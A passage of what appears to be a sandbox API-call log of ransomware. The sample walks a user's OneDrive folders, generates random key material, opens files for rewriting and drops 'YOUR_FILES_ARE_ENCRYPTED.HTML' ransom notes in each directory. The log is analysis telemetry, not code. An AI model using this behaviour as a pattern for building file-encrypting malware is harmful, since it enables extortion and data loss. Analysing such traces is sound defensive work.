2 [0113.837] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="58") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="65") returned 2 [0113.838] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="F5") returned 2 [0113.838] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="05") returned 2 [0113.838] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="C4") returned 2 [0113.838] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="EB") returned 2 [0113.838] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="B2") returned 2 [0113.838] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="56") returned 2 [0113.838] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="ED") returned 2 [0113.838] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="5C") returned 2 [0113.838] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="95") returned 2 [0113.838] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="31") returned 2 [0113.838] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png" [0113.838] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.838] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.839] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bdfde5d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1bdfde5d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1f7a8c42, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x6c00a, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ScreenshotOptIn.png", cAlternateFileName="SCREEN~2.PNG")) returned 1 [0113.839] StrStrIW (lpFirst="ScreenshotOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.839] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png") returned 95 [0113.839] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0113.839] lstrlenW (lpString=".png") returned 4 [0113.839] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0113.839] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\screenshotoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0113.844] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=442378) returned 1 [0113.844] GetProcessHeap () returned 0x600000 [0113.844] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.846] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A7") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="37") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="C4") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="58") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="91") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E6") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="64") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="A4") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="5B") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="70") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="BE") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="70") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="8D") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="72") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="25") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="B9") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="D9") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DD") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="4B") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="FE") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FE") returned 2 [0113.846] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="23") returned 2 [0113.846] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="21") returned 2 [0113.847] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="65") returned 2 [0113.847] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="67") returned 2 [0113.847] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="35") returned 2 [0113.847] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="13") returned 2 [0113.847] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="16") returned 2 [0113.847] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="6B") returned 2 [0113.847] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="98") returned 2 [0113.847] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="68") returned 2 [0113.847] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="31") returned 2 [0113.847] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png" [0113.847] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.847] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.848] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x287b3807, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x287b3807, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x287b3807, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sd-arab", cAlternateFileName="")) returned 1 [0113.848] StrStrIW (lpFirst="sd-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.848] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab") returned 83 [0113.848] GetProcessHeap () returned 0x600000 [0113.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.850] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab" [0113.850] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab\\*" [0113.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x287b3807, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x287b3807, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28cc4a7f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.855] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x287b3807, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x287b3807, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28cc4a7f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="..", cAlternateFileName="")) returned 1 [0113.855] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cc4a7f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28cc4a7f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x293271fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.855] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.855] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0113.855] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.855] lstrlenW (lpString=".mui") returned 4 [0113.855] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.855] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cc4a7f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28cc4a7f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x293271fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.855] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.855] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0113.855] GetProcessHeap () returned 0x600000 [0113.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sd-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.856] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.857] CloseHandle (hObject=0x310) returned 1 [0113.857] GetProcessHeap () returned 0x600000 [0113.857] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.857] GetProcessHeap () returned 0x600000 [0113.857] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.857] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2953d378, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2953d378, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2953d378, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sd-arab-pk", cAlternateFileName="SD-ARA~1")) returned 1 [0113.857] StrStrIW (lpFirst="sd-arab-pk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.857] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk") returned 86 [0113.857] GetProcessHeap () returned 0x600000 [0113.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.857] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk" [0113.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk\\*" [0113.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2953d378, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2953d378, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x297795d1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.858] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2953d378, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2953d378, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x297795d1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="..", cAlternateFileName="")) returned 1 [0113.858] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x297795d1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x297795d1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29ac0a15, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.858] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.858] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.858] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.858] lstrlenW (lpString=".mui") returned 4 [0113.858] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.858] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x297795d1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x297795d1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29ac0a15, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.858] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.858] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.858] GetProcessHeap () returned 0x600000 [0113.858] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sd-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.859] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.860] CloseHandle (hObject=0x310) returned 1 [0113.860] GetProcessHeap () returned 0x600000 [0113.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.860] GetProcessHeap () returned 0x600000 [0113.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.860] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29b59691, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29b59691, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29b59691, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="si-lk", cAlternateFileName="")) returned 1 [0113.860] StrStrIW (lpFirst="si-lk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.860] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk") returned 81 [0113.860] GetProcessHeap () returned 0x600000 [0113.860] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.860] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk" [0113.860] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk\\*" [0113.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29b59691, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29b59691, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName=".", cAlternateFileName="")) returned 0x626878 [0113.861] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29b59691, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29b59691, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="..", cAlternateFileName="")) returned 1 [0113.861] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a6602d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.861] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.861] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.861] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.861] lstrlenW (lpString=".mui") returned 4 [0113.861] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.861] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a6602d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.861] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0113.861] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.861] GetProcessHeap () returned 0x600000 [0113.861] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\si-lk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 